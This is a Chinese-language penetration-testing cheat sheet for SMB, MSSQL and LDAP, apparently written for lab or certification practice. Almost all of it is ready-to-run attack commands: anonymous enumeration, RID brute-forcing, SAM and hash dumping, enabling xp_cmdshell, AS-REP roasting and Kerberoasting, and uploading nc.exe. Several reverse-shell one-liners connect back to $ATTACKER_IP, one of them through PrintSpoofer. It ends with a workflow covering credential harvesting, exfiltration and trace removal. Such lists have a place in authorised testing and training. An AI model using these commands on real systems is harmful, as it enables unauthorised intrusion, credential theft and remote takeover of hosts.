SMB 枚举与利用清单
🔍 SMB 枚举与连接
smbclient -N -U "" -L \\<IP>
smbclient -N -U "test" -L \\<IP>
smbclient -N -U "Guest" -L \\<IP>
nxc smb $IP -u '' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
netexec smb $IP -u '' -p '' --shares
netexec smb $IP -u '' -p '' --users | grep -E "SMB\s+.*\s+[A-Za-z]+\.[A-Za-z]+" | awk '{print $5}' > users.txt
netexec smb $IP -u '' -p '' --rid-brute
nxc smb $IP -u 'Administrator' -p 'P@ssw0rd' -x whoami
🔓 提权与命令执行
nxc smb $IP -u 'UserName' -p 'PASSWORDHERE' --sam
grep -oP '^[^:]+:\d+:[a-f0-9]{32}:[a-f0-9]{32}' secretsdump.txt | awk -F: '{print $1}' > secretsdumpusernames.txt
grep -oP '^[^:]+:\d+:[a-f0-9]{32}:[a-f0-9]{32}' secretsdump.txt | awk -F: '{print $4}' > secretsdumphashes.txt
📂 文件传输
wget https://github.com/SnaffCon/Snaffler/releases/download/1.0.184/Snaffler.exe
smbclient \\\\$IP\\share -U "$USER" -P "$PASSWORD" -c "put /path/to/local/file /remote/path/remote_file.txt"
🚀 获取反向 Shell
nxc smb $IP -u '$USER' -p '$PASSWORD' --put-file /path/to/nc.exe /tmp/nc.exe
nxc smb $IP -u '$USER' -p '$PASSWORD' -x "C:\tmp\nc.exe $ATTACKER_IP 1234 -e cmd"
MSSQL 枚举与利用清单
🔍 枚举与连接
netexec mssql $IP -u '' -p ''
netexec mssql $IP -u '$DOMAIN\$USER' -p '$PASSWORD'
nxc mssql $IP -u $USER -p '$PASSWORD' --rid-brute
netexec mssql $IP -u '$DOMAIN\$USER' -p '$PASSWORD' -q "SELECT name FROM sys.databases"
🔓 提权与命令执行
netexec mssql $IP -u '$DOMAIN\$USER' -p '$PASSWORD' --enable-xp-cmdshell
netexec mssql $IP -u '$DOMAIN\$USER' -p '$PASSWORD' -x "whoami /all"
netexec mssql $IP -u $USER -p '$PASSWORD' -M mssql_priv
netexec mssql $IP -u $USER -p '$PASSWORD' -M mssql_priv -o ACTION=privesc
📂 文件传输
nxc mssql $IP -u $USER -p '$PASSWORD' --put-file /tmp/local_file C:\\Windows\\Temp\\remote_file.txt
nxc mssql $IP -u $USER -p '$PASSWORD' --get-file C:\\Windows\\Temp\\remote_file.txt /tmp/local_file
🚀 反向 Shell 获取
nxc mssql $IP -u $USER -p '$PASSWORD' --put-file nc.exe
nxc mssql $IP -u $USER -p '$PASSWORD' -x "C:\Windows\Temp\nc.exe $ATTACKER_IP 1234 -e cmd"
nxc mssql $IP -u $USER -p '$PASSWORD' -x 'C:\Windows\Temp\PrintSpoofer64.exe -c "C:\Windows\Temp\nc.exe $ATTACKER_IP 1234 -e cmd"'
nxc mssql $IP -u '' -p '' -x '<PAYLOAD REVERSE SHELL BASE64 HERE>'
LDAP 枚举与利用清单
🔍 枚举与连接
nxc ldap $IP -u '$USER' -p '$PASSWORD'
nxc ldap $IP -u '$USER' -p '$PASSWORD' --users
nxc ldap $IP -u '$USER' -p '$PASSWORD' --groups
nxc ldap $IP -u '$USER' -p '$PASSWORD' --gpos
ldapsearch -v -x -b "DC=example,DC=com" -H "ldap://$IP" "(objectclass=*)"
ldapsearch -v -x -b "DC=example,DC=com" -H "ldap://$IP" "(objectclass=*)" | grep samaccountname
🔓 Kerberos 攻击与信息收集
nxc ldap $IP -u $USER -p '' --asreproast output.txt
nxc ldap $IP -u '$USER' -p '$PASSWORD' --kerberoasting output.txt
nxc ldap $IP -u '$USER' -p '$PASSWORD' -M get-desc-users
nxc ldap $IP -u 'users.txt' -p 'passwords.txt' --bloodhound -c all --dns-server $DNS_SERVER
📂 文件传输(LDAP 环境)
nxc ldap $IP -u '$USER' -p '$PASSWORD' --put-file /tmp/local_file /remote/path/remote_file.txt
nxc ldap $IP -u '$USER' -p '$PASSWORD' --get-file /remote/path/remote_file.txt /tmp/local_file
🚀 获取反向 Shell(LDAP 环境)
nxc ldap $IP -u '$USER' -p '$PASSWORD' --put-file nc.exe /tmp/nc.exe
nxc ldap $IP -u '$USER' -p '$PASSWORD' -x "C:\tmp\nc.exe $ATTACKER_IP 1234 -e cmd"
nxc ldap $IP -u '$USER' -p '$PASSWORD' -x 'C:\tmp\PrintSpoofer64.exe -c "C:\tmp\nc.exe $ATTACKER_IP 1234 -e cmd"'
nxc ldap $IP -u '$USER' -p '$PASSWORD' -x '<PAYLOAD REVERSE SHELL BASE64 HERE>'
🔧 其他 LDAP 利用方式
ldapsearch -v -x -b "DC=example,DC=com" -H "ldap://$IP" "(objectclass=*)" | grep description
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://$IP" "(objectclass=*)"
🛠️ 渗透流程建议
✅ 前期准备
- 网络探测与端口扫描(Nmap, Masscan)
- 识别开放服务与版本
- 初步信息收集(Banner、SMB/LDAP 匿名访问等)
⚙️ 利用阶段
- 尝试已识别服务的漏洞利用
- 获取初始访问权限(低权限账号、RCE 等)
🔄 后渗透操作
- 横向移动、权限提升
- 凭证抓取、内网信息收集
- 敏感数据搜集与 exfiltration
🧹 痕迹清除与文档记录